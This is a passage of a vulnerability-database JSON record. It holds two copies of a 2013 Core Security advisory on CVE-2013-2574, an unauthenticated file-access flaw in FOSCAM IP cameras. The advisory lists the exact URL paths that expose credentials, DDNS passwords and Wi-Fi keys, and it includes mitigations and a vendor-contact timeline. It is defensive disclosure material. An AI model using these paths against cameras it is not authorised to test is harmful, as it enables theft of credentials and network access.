workd-writable file allowing DoS attacks to fill file system.", "modified": "2006-06-02T00:00:00", "published": "2006-06-02T00:00:00", "id": "SECURITYVULNS:VULN:6213", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:6213", "title": "Weak xmcd security permissions", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2016-02-03T05:03:29", "bulletinFamily": "exploit", "description": "FOSCAM IP-Cameras Improper Access Restrictions. CVE-2013-2574. Webapps exploit for hardware platform", "modified": "2013-07-24T00:00:00", "published": "2013-07-24T00:00:00", "id": "EDB-ID:27076", "href": "https://www.exploit-db.com/exploits/27076/", "type": "exploitdb", "title": "FOSCAM IP-Cameras Improper Access Restrictions", "sourceData": "Core Security - Corelabs Advisory\r\nhttp://corelabs.coresecurity.com/\r\n\r\nFOSCAM IP-Cameras Improper Access Restrictions\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: FOSCAM IP-Cameras Improper Access Restrictions\r\nAdvisory ID: CORE-2013-0613\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/advisories/foscam-ip-cameras-improper-access-restrictions\r\nDate published: 2013-07-23\r\nDate of last update: 2013-07-23\r\nVendors contacted: Foscam\r\nRelease mode: User release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Information Exposure [CWE-200]\r\nImpact: Security bypass\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2013-2574\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nDue to improper access restriction the FOSCAM FI8620 device [1] allows a\r\nremote attacker to browse and access arbitrary files from the following\r\ndirectories '/tmpfs/' and '/log/' without requiring authentication. This\r\ncould allow a remote attacker to obtain valuable information such as\r\naccess credentials, Wi-Fi configuration and other sensitive information\r\nin plain text.\r\n\r\nThe list of affected files includes, but is not limited to, the following:\r\n\r\n . 'http://<target_ip>/tmpfs/config_backup.bin'\r\n . 'http://<target_ip>/tmpfs/config_restore.bin'\r\n . 'http://<target_ip>/tmpfs/ddns.conf'\r\n . 'http://<target_ip>/tmpfs/syslog.txt'\r\n . 'http://<target_ip>/log/syslog.txt'\r\n\r\n\r\n4. *Vulnerable Packages*\r\n\r\n . FOSCAM FI8620 PTZ Camera.\r\n . Other Foscam devices based on the same firmware are probably\r\naffected too, but they were not checked.\r\n\r\n\r\n5. *Non-Vulnerable Packages*\r\n\r\nVendor did not provide details. Contact Foscam for further information.\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nThere was no official answer from Foscam after several attempts (see\r\n[Sec. 9]); contact vendor for further information. Some mitigation\r\nactions may be do not expose the camera to internet unless absolutely\r\nnecessary and have at least one proxy filtering HTTP requests to the\r\nfollowing resources:\r\n\r\n . '/tmpfs/config_backup.bin'\r\n . '/tmpfs/config_restore.bin'\r\n . '/tmpfs/ddns.conf'\r\n . '/tmpfs/syslog.txt'\r\n . '/log/syslog.txt'\r\n\r\n\r\n7. *Credits*\r\n\r\nThis vulnerability was discovered by Flavio de Cristofaro and researched\r\nwith the help of Andres Blanco from Core Security Technologies. The\r\npublication of this advisory was coordinated by Fernando Miranda from\r\nCore Advisories Team.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\n8.1. *Accessing Manufacturer DDNS configuration*\r\n\r\nBy requesting the following URL using your default web browser:\r\n\r\n\r\n/-----\r\nhttp://<target_ip>/tmpfs/ddns.conf\r\n-----/\r\n\r\nyou will see something like this:\r\n\r\n\r\n/-----\r\n[LoginInfo]\r\nHostName=ddns.myfoscam.org\r\nHostIP=113.105.65.47\r\nPort=8080\r\nUserName=<target username>\r\nPassword=<target plain password>\r\n[Domain]\r\nDomain=<target username>.myfoscam.org;\r\n-----/\r\n\r\n\r\n8.2. *Access Credentials Stored in Backup Files*\r\n\r\nWhen a configuration backup is required by an operator/administrator,\r\nthe backup is generated in the local folder 'tmpfs' named as\r\n'config_backup.bin'. The binary file is just a dump of the whole\r\nconfiguration packed as Gzip and can be accessed by accessing the\r\nfollowing URL:\r\n\r\n/-----\r\nhttp://<target_ip>/tmpfs/config_backup.bin\r\n-----/\r\n\r\nThe presence of this temporary file enables an unauthenticated attacker\r\nto download the configuration files which contain usernames, plaintext\r\npasswords (including admin passwords), Wifi configuration including\r\nplain PSK, among other interesting stuff as shown below:\r\n\r\n/-----\r\nusername = \"admin \"\r\npassword = \"admin \"\r\nauthtype = \"15 \" \r\nauthgroup = \" \"\r\n[user1]\r\nusername = \"user \"\r\npassword = \"user \"\r\nauthtype = \"3 \" \r\nauthgroup = \" \"\r\n[user2]\r\nusername = \"guest \"\r\npassword = \"guest \"\r\nauthtype = \"1 \" \r\nauthgroup = \" \"\r\n-----/\r\n\r\nIt is important to mention that, in order to access the configuration\r\nfile previously mentioned, an operator and/or administrator should have\r\nexecuted the backup process in advance.\r\n\r\n\r\n9. *Report Timeline*\r\n. 2013-06-12:\r\nCore Security Technologies notifies the Foscam team of the vulnerability.\r\n\r\n. 2013-06-12:\r\nVendor acknowledges the receipt of the email and asks for technical\r\ndetails.\r\n\r\n. 2013-06-13:\r\nA draft report with technical details and a PoC is sent to vendor.\r\nPublication date is set for Jul 3rd, 2013.\r\n\r\n. 2013-06-17:\r\nCore asks if the vulnerabilities are confirmed.\r\n\r\n. 2013-06-17:\r\nFoscam product team notifies that they have checked CORE's website [2],\r\nbut there is no Foscam info.\r\n\r\n. 2013-06-18:\r\nCore notifies that the advisory has not been published yet and re-sends\r\ntechnical details and proof of concept.\r\n\r\n. 2013-06-26:\r\nCORE asks for a reply.\r\n\r\n. 2013-07-03:\r\nFirst release date missed.\r\n\r\n. 2013-07-03:\r\nCore asks for a reply.\r\n\r\n. 2013-07-11:\r\nCore notifies that the issues were reported 1 month ago and there was no\r\nreply since [2013-06-18].\r\n\r\n. 2013-07-23:\r\nCore releases the advisory CORE-2013-0613 tagged as user-release.\r\n\r\n\r\n10. *References*\r\n\r\n[1] Foscam FI8620 - http://www.foscam.com/prd_view.aspx?id=176.\r\n[2] CORE Security Advisories http://www.coresecurity.com/grid/advisories.\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2013 Core Security\r\nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/27076/"}], "packetstorm": [{"lastseen": "2016-12-05T22:21:03", "bulletinFamily": "exploit", "description": "", "modified": "2013-07-23T00:00:00", "published": "2013-07-23T00:00:00", "href": "https://packetstormsecurity.com/files/122521/FOSCAM-IP-Cameras-Improper-Access-Restrictions.html", "id": "PACKETSTORM:122521", "type": "packetstorm", "title": "FOSCAM IP-Cameras Improper Access Restrictions", "sourceData": "`Core Security - Corelabs Advisory \nhttp://corelabs.coresecurity.com/ \n \nFOSCAM IP-Cameras Improper Access Restrictions \n \n \n1. *Advisory Information* \n \nTitle: FOSCAM IP-Cameras Improper Access Restrictions \nAdvisory ID: CORE-2013-0613 \nAdvisory URL: \nhttp://www.coresecurity.com/advisories/foscam-ip-cameras-improper-access-restrictions \nDate published: 2013-07-23 \nDate of last update: 2013-07-23 \nVendors contacted: Foscam \nRelease mode: User release \n \n \n2. *Vulnerability Information* \n \nClass: Information Exposure [CWE-200] \nImpact: Security bypass \nRemotely Exploitable: Yes \nLocally Exploitable: No \nCVE Name: CVE-2013-2574 \n \n \n3. *Vulnerability Description* \n \nDue to improper access restriction the FOSCAM FI8620 device [1] allows a \nremote attacker to browse and access arbitrary files from the following \ndirectories '/tmpfs/' and '/log/' without requiring authentication. This \ncould allow a remote attacker to obtain valuable information such as \naccess credentials, Wi-Fi configuration and other sensitive information \nin plain text. \n \nThe list of affected files includes, but is not limited to, the following: \n \n. 'http://<target_ip>/tmpfs/config_backup.bin' \n. 'http://<target_ip>/tmpfs/config_restore.bin' \n. 'http://<target_ip>/tmpfs/ddns.conf' \n. 'http://<target_ip>/tmpfs/syslog.txt' \n. 'http://<target_ip>/log/syslog.txt' \n \n \n4. *Vulnerable Packages* \n \n. FOSCAM FI8620 PTZ Camera. \n. Other Foscam devices based on the same firmware are probably \naffected too, but they were not checked. \n \n \n5. *Non-Vulnerable Packages* \n \nVendor did not provide details. Contact Foscam for further information. \n \n \n6. *Vendor Information, Solutions and Workarounds* \n \nThere was no official answer from Foscam after several attempts (see \n[Sec. 9]); contact vendor for further information. Some mitigation \nactions may be do not expose the camera to internet unless absolutely \nnecessary and have at least one proxy filtering HTTP requests to the \nfollowing resources: \n \n. '/tmpfs/config_backup.bin' \n. '/tmpfs/config_restore.bin' \n. '/tmpfs/ddns.conf' \n. '/tmpfs/syslog.txt' \n. '/log/syslog.txt' \n \n \n7. *Credits* \n \nThis vulnerability was discovered by Flavio de Cristofaro and researched \nwith the help of Andres Blanco from Core Security Technologies. The \npublication of this advisory was coordinated by Fernando Miranda from \nCore Advisories Team. \n \n \n8. *Technical Description / Proof of Concept Code* \n \n8.1. *Accessing Manufacturer DDNS configuration* \n \nBy requesting the following URL using your default web browser: \n \n \n/----- \nhttp://<target_ip>/tmpfs/ddns.conf \n-----/ \n \nyou will see something like this: \n \n \n/----- \n[LoginInfo] \nHostName=ddns.myfoscam.org \nHostIP=113.105.65.47 \nPort=8080 \nUserName=<target username> \nPassword=<target plain password> \n[Domain] \nDomain=<target username>.myfoscam.org; \n-----/ \n \n \n8.2. *Access Credentials Stored in Backup Files* \n \nWhen a configuration backup is required by an operator/administrator, \nthe backup is generated in the local folder 'tmpfs' named as \n'config_backup.bin'. The binary file is just a dump of the whole \nconfiguration packed as Gzip and can be accessed by accessing the \nfollowing URL: \n \n/----- \nhttp://<target_ip>/tmpfs/config_backup.bin \n-----/ \n \nThe presence of this temporary file enables an unauthenticated attacker \nto download the configuration files which contain usernames, plaintext \npasswords (including admin passwords), Wifi configuration including \nplain PSK, among other interesting stuff as shown below: \n \n/----- \nusername = \"admin \" \npassword = \"admin \" \nauthtype = \"15 \" \nauthgroup = \" \" \n[user1] \nusername = \"user \" \npassword = \"user \" \nauthtype = \"3 \" \nauthgroup = \" \" \n[user2] \nusername = \"guest \" \npassword = \"guest \" \nauthtype = \"1 \" \nauthgroup = \" \" \n-----/ \n \nIt is important to mention that, in order to access the configuration \nfile previously mentioned, an operator and/or administrator should have \nexecuted the backup process in advance. \n \n \n9. *Report Timeline* \n. 2013-06-12: \nCore Security Technologies notifies the Foscam team of the vulnerability. \n \n. 2013-06-12: \nVendor acknowledges the receipt of the email and asks for technical \ndetails. \n \n. 2013-06-13: \nA draft report with technical details and a PoC is sent to vendor. \nPublication date is set for Jul 3rd, 2013. \n \n. 2013-06-17: \nCore asks if the vulnerabilities are confirmed. \n \n. 2013-06-17: \nFoscam product team notifies that they have checked CORE's website [2], \nbut there is no Foscam info. \n \n. 2013-06-18: \nCore notifies that the advisory has not been published yet and re-sends \ntechnical details and proof of concept. \n \n. 2013-06-26: \nCORE asks for a reply. \n \n. 2013-07-03: \nFirst release date missed. \n \n. 2013-07-03: \nCore asks for a reply. \n \n. 2013-07-11: \nCore notifies that the issues were reported 1 month ago and there was no \nreply since [2013-06-18]. \n \n. 2013-07-23: \nCore releases the advisory CORE-2013-0613 tagged as user-release. \n \n \n10. *References* \n \n[1] Foscam FI8620 - http://www.foscam.com/prd_view.aspx?id=176. \n[2] CORE Security Advisories http://www.coresecurity.com/grid/advisories. \n \n \n11. *About CoreLabs* \n \nCoreLabs, the research center of Core Security Technologies, is charged \nwith anticipating the future needs and requirements for information \nsecurity technologies. We conduct our research in several important \nareas of computer security including system vulnerabilities, cyber \nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of \nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers, \nproject information and shared software tools for public use at: \nhttp://corelabs.coresecurity.com. \n \n \n12. *About Core Security Technologies* \n \nCore Security Technologies enables organizations to get ahead of threats \nwith security test and measurement solutions that continuously identify \nand demonstrate real-world exposures to their most critical assets. Our \ncustomers can gain real visibility into their security standing, real \nvalidation of their security controls, and real metrics to more \neffectively secure their organizations. \n \nCore Security's software solutions build on over a decade of trusted \nresearch and leading-edge threat expertise from the company's Security \nConsulting Services, CoreLabs and Engineering groups. Core Security \nTechnologies can be reached at +1 (617) 399-6980 or on the Web at: \nhttp://www.coresecurity.com. \n \n \n13. *Disclaimer* \n \nThe contents of this advisory are copyright (c) 2013 Core Security \nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative \nCommons Attribution Non-Commercial Share-Alike 3.0 (United States) \nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ \n \n \n14. *PGP/GPG Keys* \n \nThis advisory has been signed with the GPG key of Core Security \nTechnologies advisories team, which is available for download at \nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/122521/CORE-2013-0613.txt"}]}